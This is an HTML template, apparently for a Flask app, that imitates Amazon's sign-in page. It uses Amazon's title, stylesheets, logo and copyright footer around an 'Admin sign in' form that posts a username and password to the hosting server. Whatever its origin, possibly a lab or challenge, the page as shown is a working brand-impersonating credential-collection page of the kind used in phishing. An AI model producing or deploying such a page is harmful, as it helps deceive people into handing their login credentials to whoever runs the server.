<!DOCTYPE html>
<html>
<head>
<title dir="ltr">Amazon Sign In</title>
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css#AUIClients/AmazonUI.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|41i8aEvLYXL.css,21EmREG-NIL.css_.css#AUIClients/AuthenticationPortalAssets.debug.secure-true.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.debug.secure-true.min">
</head>
 
<body>
<div class="a-section a-spacing-none auth-navbar">
    <div class="a-section a-spacing-medium a-text-center">
        <a class="a-link-nav-icon" tabindex="-1" href="{{ url_for('index') }}">
        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
        </a>
    </div>
</div>

<div id="authportal-center-section" class="a-section">
<div id="authportal-main-section" class="a-section">
<div class="a-section a-spacing-base auth-pagelet-container">
<div id="auth-cookie-warning-message"><div class="a-alert-content">
<p>
<a class="a-link-normal" href="/gp/help/customer/display.html/ref=ap_cookie_error_help?">
</a>
</p>
</div></div></div>
</div>
<div class="a-section auth-pagelet-container">

<div class="a-section a-spacing-base">
  <div class="a-section">
    <form name="signIn" method="post" class="auth-validate-form auth-real-time-validation a-spacing-none fwcim-form">
    <div class="a-section">
    <div class="a-box"><div class="a-box-inner a-padding-extra-large">
      <h1 class="a-spacing-small">
          Admin sign in
      </h1>
          <!-- optional subheading element -->
      <div class="a-row a-spacing-base">
        
        <label for="username" class="a-form-label">
          Username:
        </label>
    <input type="text" id="ap-credential-autofill-hint" name="username" class="a-input-text a-span12">
        <label for="password" class="a-form-label">
          Password:
        </label>
        
    <input type="password" id="ap-credential-autofill-hint" name="password" class="a-input-text a-span12">
    <div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
    </div></div></div>
    </div>

    <div class="a-section">
            
    <span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><input id="continue" tabindex="5" class="a-button-input" type="submit" aria-labelledby="continue-announce"><span id="continue-announce" class="a-button-text" aria-hidden="true">
              Continue
            </span></span></span>
    
    </div>
        </div></div>
      </div>
    </form>
  </div>
</div>
</div>
            </div>
      </div>
  
</body>
    
<div class="a-section a-spacing-top-extra-large auth-footer">

<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-none a-text-center">
<span class="a-size-mini a-color-secondary">
  © 1996-2018, Amazon.com, Inc. or its affiliates
</span>

</div>

</div>

</html>
